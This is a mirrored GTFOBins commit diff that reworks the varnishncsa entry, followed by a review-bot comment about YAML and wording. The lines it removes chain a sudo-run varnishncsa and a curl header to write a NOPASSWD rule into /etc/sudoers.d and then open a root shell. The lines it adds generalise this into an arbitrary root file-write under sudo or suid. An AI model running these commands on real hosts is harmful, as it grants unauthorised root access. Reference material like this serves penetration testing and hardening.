mirror of https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Polish varnishncsa
parent 0190295ed2
commit efaf1b11e8
@ -1,8 +1,18 @@
|
|||||||
---
|
---
|
||||||
description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format.
|
description: |
|
||||||
|
This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
|
||||||
|
|
||||||
|
```
|
||||||
|
curl -H 'yyy: DATA' http://localhost:6081/xxx
|
||||||
|
```
|
||||||
|
description:
|
||||||
functions:
|
functions:
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user &
|
code: |
|
||||||
- code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo
|
LFILE=file_to_write
|
||||||
- code: sudo bash
|
sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
|
||||||
|
suid:
|
||||||
|
code: |
|
||||||
|
LFILE=file_to_write
|
||||||
|
./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
|
||||||
---
|
---
|
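Review bot: a bare `description:` line still sits between the closing fence of the new `description: |` block and `functions:`, and the `+1,18` count only adds up if that line is on the new side. If it is at the same level as the block-scalar key, it is a duplicate mapping key, and a loader that keeps the last value would drop the new text in favour of an empty description; remove it or confirm it is nested elsewhere. Separately, the new `sudo` and `suid` commands no longer end in `&` as the old first `- code:` entry did, so `varnishncsa` stays in the foreground, yet the description only says "First start `varnishncsa` as follows, then trigger the file write"; state that the `curl` request is issued from a second shell, or keep the backgrounding. The description also says the write happens "as root" while the same text now covers the `suid` entry, where the effective user is the binary's owner; wording such as "as the privileged user" would cover both.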